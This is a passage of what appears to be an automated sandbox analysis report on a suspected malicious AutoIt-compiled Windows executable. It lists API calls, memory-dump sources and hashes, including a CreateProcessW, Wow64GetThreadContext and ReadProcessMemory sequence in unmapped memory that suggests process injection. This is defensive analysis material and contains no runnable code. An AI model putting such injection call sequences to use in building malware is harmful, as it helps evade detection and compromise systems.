                                                                • Part of subcall function 00F13B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00FD52F8,00FD52E0,?,?), ref: 00F13BEB
                                                                • Part of subcall function 00F13B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00F13C6F
                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00F14874
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                              • String ID:
                                                              • API String ID: 1438897964-0
                                                              • Opcode ID: fd67a8c6677f1a59b2347e3d2dddeec231ec8b8da6caf08daf210a9e5ef6760c
                                                              • Instruction ID: b9d9e8d9a58de68796a99cbaf627f4b15b97f8e2f99183425aa91bc412ee4ae0
                                                              • Opcode Fuzzy Hash: fd67a8c6677f1a59b2347e3d2dddeec231ec8b8da6caf08daf210a9e5ef6760c
                                                              • Instruction Fuzzy Hash: 3B119D719093099BC700EF78DC4594ABBE9EF8A761F10451FF040832B1DBB09589EB92
                                                              APIs
                                                                • Part of subcall function 00F3571C: __FF_MSGBANNER.LIBCMT ref: 00F35733
                                                                • Part of subcall function 00F3571C: __NMSG_WRITE.LIBCMT ref: 00F3573A
                                                                • Part of subcall function 00F3571C: RtlAllocateHeap.NTDLL(015D0000,00000000,00000001,00000000,?,?,?,00F30DD3,?), ref: 00F3575F
                                                              • std::exception::exception.LIBCMT ref: 00F30DEC
                                                              • __CxxThrowException@8.LIBCMT ref: 00F30E01
                                                                • Part of subcall function 00F3859B: RaiseException.KERNEL32(?,?,?,00FC9E78,00000000,?,?,?,?,00F30E06,?,00FC9E78,?,00000001), ref: 00F385F0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                              • String ID:
                                                              • API String ID: 3902256705-0
                                                              • Opcode ID: 022e625e7a03b9da50e83ccaf40eaf985e69bbb962de3cce9c0b9a3da6ed130b
                                                              • Instruction ID: 71e8e2ecd3747d3226d38f734461986bf1719b1b7ce703ebb66545de105b3dce
                                                              • Opcode Fuzzy Hash: 022e625e7a03b9da50e83ccaf40eaf985e69bbb962de3cce9c0b9a3da6ed130b
                                                              • Instruction Fuzzy Hash: 5DF0A97590031E66CB10FA98DC15ADE77AC9F01371F104456FD0496942DF759A81B1E1
                                                              APIs
                                                                • Part of subcall function 00F38B28: __getptd_noexit.LIBCMT ref: 00F38B28
                                                              • __lock_file.LIBCMT ref: 00F353EB
                                                                • Part of subcall function 00F36C11: __lock.LIBCMT ref: 00F36C34
                                                              • __fclose_nolock.LIBCMT ref: 00F353F6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                              • String ID:
                                                              • API String ID: 2800547568-0
                                                              • Opcode ID: 6838b062456652857c27adda751a2e03739ebb8d091a1f2e04a7d1fe526459b4
                                                              • Instruction ID: 7d13111de5cd9bf5344b41c10afa81c6887f57ddd42dd9236263553c66736c29
                                                              • Opcode Fuzzy Hash: 6838b062456652857c27adda751a2e03739ebb8d091a1f2e04a7d1fe526459b4
                                                              • Instruction Fuzzy Hash: 23F0BB71C01B059ADB11BF759C067AD77E16F81BB5F218108B424AB1C1CFFC8942BB62
                                                              APIs
                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 017A7D9B
                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 017A7E31
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 017A7E53
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2129210722.00000000017A6000.00000040.00000020.00020000.00000000.sdmp, Offset: 017A6000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_17a6000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                              • String ID:
                                                              • API String ID: 2438371351-0
                                                              • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                              • Instruction ID: 10d8f73d78102fbc5ae390b12fccf3ee5ff01ada59998cea62022bbafa852bf2
                                                              • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                              • Instruction Fuzzy Hash: D512EE24E24658C6EB24DF64D8507DEB232EF68300F1091E9910DEB7A4E77A4F81CF5A
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                              • Instruction ID: e66014e7e1cb56a4ff0a1e93f999e7095a6d0108f17e878344734132582a5904
                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                              • Instruction Fuzzy Hash: 4931F571A001059BC718DF48C4A4A69F7A6FB493A0F2497A6E80ACB351DB31EDC1EBC0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ClearVariant
                                                              • String ID:
                                                              • API String ID: 1473721057-0
                                                              • Opcode ID: 9328393f64d2152369c2ca9b7d64f28d57cecd708776d43a505b8c5e5e474428
                                                              • Instruction ID: 07539bac84f7c5d1d07ee8e84e68c3d41509b0930175810e1245cc7c3beb5aed
                                                              • Opcode Fuzzy Hash: 9328393f64d2152369c2ca9b7d64f28d57cecd708776d43a505b8c5e5e474428
                                                              • Instruction Fuzzy Hash: 8E410974A04351DFDB14DF14C454B5ABBE1BF45324F0988ACE8998B362C736E889DF92
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: _memmove
                                                              • String ID:
                                                              • API String ID: 4104443479-0
                                                              • Opcode ID: 9e48a19b4e3f4fd8b4f8e3a7b2f46aaf9e78ea7b463a18b125f1d8281f60e4f5
                                                              • Instruction ID: cae8a169d5ec82d4ff56809e8397e0451c56c4cbba0c32be65eea18c78027730
                                                              • Opcode Fuzzy Hash: 9e48a19b4e3f4fd8b4f8e3a7b2f46aaf9e78ea7b463a18b125f1d8281f60e4f5
                                                              • Instruction Fuzzy Hash: 14213872A08B09EBDB149F15EC82BA97FB4FB54351F20846EE989C5094EB3090D0F741
                                                              APIs
                                                                • Part of subcall function 00F14BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00F14BEF
                                                                • Part of subcall function 00F3525B: __wfsopen.LIBCMT ref: 00F35266
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00FD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F14E0F
                                                                • Part of subcall function 00F14B6A: FreeLibrary.KERNEL32(00000000), ref: 00F14BA4
                                                                • Part of subcall function 00F14C70: _memmove.LIBCMT ref: 00F14CBA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Library$Free$Load__wfsopen_memmove
                                                              • String ID:
                                                              • API String ID: 1396898556-0
                                                              • Opcode ID: cab6e0f4f95e46dc5f34a24980882bcec47d5bafff0ad2cd7a109ede9b8a31ff
                                                              • Instruction ID: 6359302abd8067c4aec52c0dda0cf5ebb00ac2aedef103559e72da310544a97b
                                                              • Opcode Fuzzy Hash: cab6e0f4f95e46dc5f34a24980882bcec47d5bafff0ad2cd7a109ede9b8a31ff
                                                              • Instruction Fuzzy Hash: 0211A732604206ABCF15EF74CC16FED77A5AFC4710F108829F541E7181DA79A945B751
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ClearVariant
                                                              • String ID:
                                                              • API String ID: 1473721057-0
                                                              • Opcode ID: 31368c87201c8c08d28b9702128d0c9c476d0215ec39510b5da325018ec9e6f7
                                                              • Instruction ID: 0b1f9ed3a1acfb815401b6839d035cc9e82c52e432d819722cf390886db9f521
                                                              • Opcode Fuzzy Hash: 31368c87201c8c08d28b9702128d0c9c476d0215ec39510b5da325018ec9e6f7
                                                              • Instruction Fuzzy Hash: 8C216970A08301DFCB14DF24C854B5ABBE1BF84324F05886CF88A57722D731E849EB92
                                                              APIs
                                                              • __lock_file.LIBCMT ref: 00F348A6
                                                                • Part of subcall function 00F38B28: __getptd_noexit.LIBCMT ref: 00F38B28
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: __getptd_noexit__lock_file
                                                              • String ID:
                                                              • API String ID: 2597487223-0
                                                              • Opcode ID: a9a2c479a33785558c6462434582fa8b8c6a423cc1712bdb1a5b79f4dc82b496
                                                              • Instruction ID: df4325587abdc00c16a19092a7506ed714386e8921d6fff3c0dbc5e10ba4c398
                                                              • Opcode Fuzzy Hash: a9a2c479a33785558c6462434582fa8b8c6a423cc1712bdb1a5b79f4dc82b496
                                                              • Instruction Fuzzy Hash: F6F0AF31901709EBDF11AFA48C067AE36A0AF01376F158418B4249A191CBBCA952FB51
                                                              APIs
                                                              • FreeLibrary.KERNEL32(?,?,00FD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F14E7E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 9aa6aee8f61539b3638286763d31737844a83ffc370a727f7d48fbe5b49e7f95
                                                              • Instruction ID: 2d4baad53a292ac622fa813dc3ddb4d54e3fb9fb30e3a74418cc9a6408ce3a95
                                                              • Opcode Fuzzy Hash: 9aa6aee8f61539b3638286763d31737844a83ffc370a727f7d48fbe5b49e7f95
                                                              • Instruction Fuzzy Hash: A4F03075501711CFCB349F64E494852BBE1BF94339310893EE2D682610C731A8C4EF80
                                                              APIs
                                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00F307B0
                                                                • Part of subcall function 00F17BCC: _memmove.LIBCMT ref: 00F17C06
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: LongNamePath_memmove
                                                              • String ID:
                                                              • API String ID: 2514874351-0
                                                              • Opcode ID: 36e917b12174ccd4c483fcc235b7e600ea4a9a4cf676ff116bacfd15f833ceaa
                                                              • Instruction ID: 9aeb17743704cde38b81d64c06cde345ef23f5330a69e49528b25a7906dee44d
                                                              • Opcode Fuzzy Hash: 36e917b12174ccd4c483fcc235b7e600ea4a9a4cf676ff116bacfd15f833ceaa
                                                              • Instruction Fuzzy Hash: C1E0CD3690422857C720E7589C05FEA77EDDFC87A0F0441B6FC0CD7209D9649CD096D0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: __wfsopen
                                                              • String ID:
                                                              • API String ID: 197181222-0
                                                              • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                              • Instruction ID: 1e976f8a65562a4305166c61245eef9ee4fbf5b81926decb2fa9b5afdb159dff
                                                              • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                              • Instruction Fuzzy Hash: BCB0927644020C77CE012A82EC02A4A3B199B82B64F408020FB0C18162A677E664AA89
                                                              APIs
                                                              • Sleep.KERNELBASE(000001F4), ref: 017A85F1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2129210722.00000000017A6000.00000040.00000020.00020000.00000000.sdmp, Offset: 017A6000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_17a6000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                              • Instruction ID: 4839e18c3809b118aa1694f6425af3eb72d8bdd8a1161eaf99fa975f7479103e
                                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                              • Instruction Fuzzy Hash: 43E0E67494410DDFDB00EFB4D54969E7FB4EF04302F104261FD01D2281D6309D508A66
                                                              APIs
                                                                • Part of subcall function 00F12612: GetWindowLongW.USER32(?,000000EB), ref: 00F12623
                                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00F9CB37
                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F9CB95
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00F9CBD6
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F9CC00
                                                              • SendMessageW.USER32 ref: 00F9CC29
                                                              • _wcsncpy.LIBCMT ref: 00F9CC95
                                                              • GetKeyState.USER32(00000011), ref: 00F9CCB6
                                                              • GetKeyState.USER32(00000009), ref: 00F9CCC3
                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F9CCD9
                                                              • GetKeyState.USER32(00000010), ref: 00F9CCE3
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F9CD0C
                                                              • SendMessageW.USER32 ref: 00F9CD33
                                                              • SendMessageW.USER32(?,00001030,?,00F9B348), ref: 00F9CE37
                                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00F9CE4D
                                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00F9CE60
                                                              • SetCapture.USER32(?), ref: 00F9CE69
                                                              • ClientToScreen.USER32(?,?), ref: 00F9CECE
                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00F9CEDB
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F9CEF5
                                                              • ReleaseCapture.USER32 ref: 00F9CF00
                                                              • GetCursorPos.USER32(?), ref: 00F9CF3A
                                                              • ScreenToClient.USER32(?,?), ref: 00F9CF47
                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F9CFA3
                                                              • SendMessageW.USER32 ref: 00F9CFD1
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F9D00E
                                                              • SendMessageW.USER32 ref: 00F9D03D
                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00F9D05E
                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00F9D06D
                                                              • GetCursorPos.USER32(?), ref: 00F9D08D
                                                              • ScreenToClient.USER32(?,?), ref: 00F9D09A
                                                              • GetParent.USER32(?), ref: 00F9D0BA
                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F9D123
                                                              • SendMessageW.USER32 ref: 00F9D154
                                                              • ClientToScreen.USER32(?,?), ref: 00F9D1B2
                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00F9D1E2
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F9D20C
                                                              • SendMessageW.USER32 ref: 00F9D22F
                                                              • ClientToScreen.USER32(?,?), ref: 00F9D281
                                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00F9D2B5
                                                                • Part of subcall function 00F125DB: GetWindowLongW.USER32(?,000000EB), ref: 00F125EC
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00F9D351
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                              • String ID: @GUI_DRAGID$F
                                                              • API String ID: 3977979337-4164748364
                                                              • Opcode ID: 75cceaa6b5ad17d73b25c5129fd60ea63907cd0f762eaa8e259465d75334bfd1
                                                              • Instruction ID: 4276f485375e8a71c76dba65b348b39f8a2b8282926c4579d8e6ba62f0bec6b8
                                                              • Opcode Fuzzy Hash: 75cceaa6b5ad17d73b25c5129fd60ea63907cd0f762eaa8e259465d75334bfd1
                                                              • Instruction Fuzzy Hash: A3429A74A04345AFEB24CF24C844EAABBE5FF89760F14051AF595C72A1C731D854FB92
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: _memmove$_memset
                                                              • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                              • API String ID: 1357608183-1798697756
                                                              • Opcode ID: 7625a422642600015b5b630217646f8e15658cee70f5d6223cba1192cb47918c
                                                              • Instruction ID: 923061eb9f4313dc5a9f3d89dbd5cad5b24f3c3d8ab0a50d9694b7b162c3d577
                                                              • Opcode Fuzzy Hash: 7625a422642600015b5b630217646f8e15658cee70f5d6223cba1192cb47918c
                                                              • Instruction Fuzzy Hash: A793A271E04219DFDB24DF98D881BADB7B1FF48320F24816AE945AB381E7749D81EB50
                                                              APIs
                                                              • GetForegroundWindow.USER32(00000000,?), ref: 00F148DF
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F4D665
                                                              • IsIconic.USER32(?), ref: 00F4D66E
                                                              • ShowWindow.USER32(?,00000009), ref: 00F4D67B
                                                              • SetForegroundWindow.USER32(?), ref: 00F4D685
                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F4D69B
                                                              • GetCurrentThreadId.KERNEL32 ref: 00F4D6A2
                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F4D6AE
